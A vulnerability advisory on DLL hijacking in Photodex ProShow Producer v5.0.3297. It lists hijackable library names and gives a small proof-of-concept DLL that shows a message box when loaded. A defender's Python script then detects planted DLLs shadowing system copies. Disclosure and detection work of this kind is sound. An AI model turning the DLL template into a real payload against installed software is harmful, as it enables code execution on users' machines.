Inshell Security Advisory
http://www.inshell.net

1. ADVISORY INFORMATION
-----------------------
Product:        Photodex ProShow Producer
Vendor URL:     www.photodex.com
Type:           Uncontrolled Search Path Element [CWE-427]
Date found:     2013-02-23
Date published: 2013-02-23
CVSSv2 Score:   4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE:            -

2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from Inshell Security.

3. VERSIONS AFFECTED
--------------------
Photodex ProShow Producer v5.0.3297; older versions may be affected too.

4. VULNERABILITY DESCRIPTION
----------------------------
An insecure library loading vulnerability has been identified in Photodex ProShow Producer v5.0.3297.

The application uses a fixed search path to look for specific files or libraries. This path includes directories that may not be trusted or may be under user control. By placing a custom version of a library in the application path, an attacker can cause the program to load it before the legitimate version. This allows the attacker to inject custom code that runs with the privileges of the program or of the user executing it.

The following libraries could be hijacked in this way:

d3d9.dll
dbghelp.dll
dciman32.dll
ddraw.dll
midimap.dll
mscms.dll
ws2help.dll

5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
// Build with wine gcc: gcc -Wall -shared inject.c -o ddraw.dll
// When the application loads this ddraw.dll instead of the system copy,
// the entry point below runs in its process and shows a message box.
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)
{
    // DLL_PROCESS_ATTACH: the library has just been mapped into the process
    if (dwReason == DLL_PROCESS_ATTACH) {
        MessageBox(0, "DLL Injection", "DLL Injection", 0);
    }
    return TRUE;
}

For further screenshots and/or PoCs visit:
http://security.inshell.net/advisory/48

6. SOLUTION
-----------
None

7. REPORT TIMELINE
------------------
2013-02-23: Discovery of the vulnerability
2013-02-23: Full disclosure because the vendor ignored previous reports.

8. REFERENCES
-------------
http://security.inshell.net/advisory/48
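As an added defender-side check that is not part of the advisory: a script that audits an application's install directory for files whose names match the system DLLs listed in section 4, since the loader resolves those names from the application directory before the system directory. The directory layout, file contents and the System32 stand-in are constructed here for the demonstration.

```python
import hashlib
import tempfile
from pathlib import Path

# DLL names the advisory lists as hijackable in ProShow Producer v5.0.3297
HIJACKABLE_DLLS = {
    "d3d9.dll", "dbghelp.dll", "dciman32.dll", "ddraw.dll",
    "midimap.dll", "mscms.dll", "ws2help.dll",
}

def sha256_of(path):
    """Hash a file so a planted copy can be compared with the system copy."""
    return hashlib.sha256(path.read_bytes()).hexdigest()

def find_shadowing_dlls(app_dir, system_dir=None, names=HIJACKABLE_DLLS):
    """Return findings for files in app_dir named like a system DLL.

    The loader searches the application directory before the system
    directory, so any such file shadows the legitimate library. With
    system_dir given (e.g. C:\\Windows\\System32), hashes are compared.
    """
    findings = []
    for entry in Path(app_dir).iterdir():
        name = entry.name.lower()  # DLL names are matched case-insensitively
        if not entry.is_file() or name not in names:
            continue
        finding = {"path": str(entry), "name": name, "differs_from_system": None}
        legit = Path(system_dir) / name if system_dir is not None else None
        if legit is not None and legit.is_file():
            finding["differs_from_system"] = sha256_of(entry) != sha256_of(legit)
        findings.append(finding)
    return sorted(findings, key=lambda f: f["name"])

def demo():
    """Constructed layout: a fake install dir with a planted ddraw.dll."""
    with tempfile.TemporaryDirectory() as tmp:
        app, system = Path(tmp, "ProShow"), Path(tmp, "System32")
        app.mkdir()
        system.mkdir()
        (app / "proshow.exe").write_bytes(b"MZ-not-a-dll")  # benign program file
        (app / "DDraw.dll").write_bytes(b"planted")          # shadows the system DLL
        (system / "ddraw.dll").write_bytes(b"legitimate")    # what should be loaded
        return find_shadowing_dlls(app, system)

if __name__ == "__main__":
    for f in demo():
        print(f"{f['name']}: {f['path']} (differs from system: {f['differs_from_system']})")
```

Point it at the real install directory and at the working directory the application is started from; a file carrying one of these names outside the system directory warrants investigation.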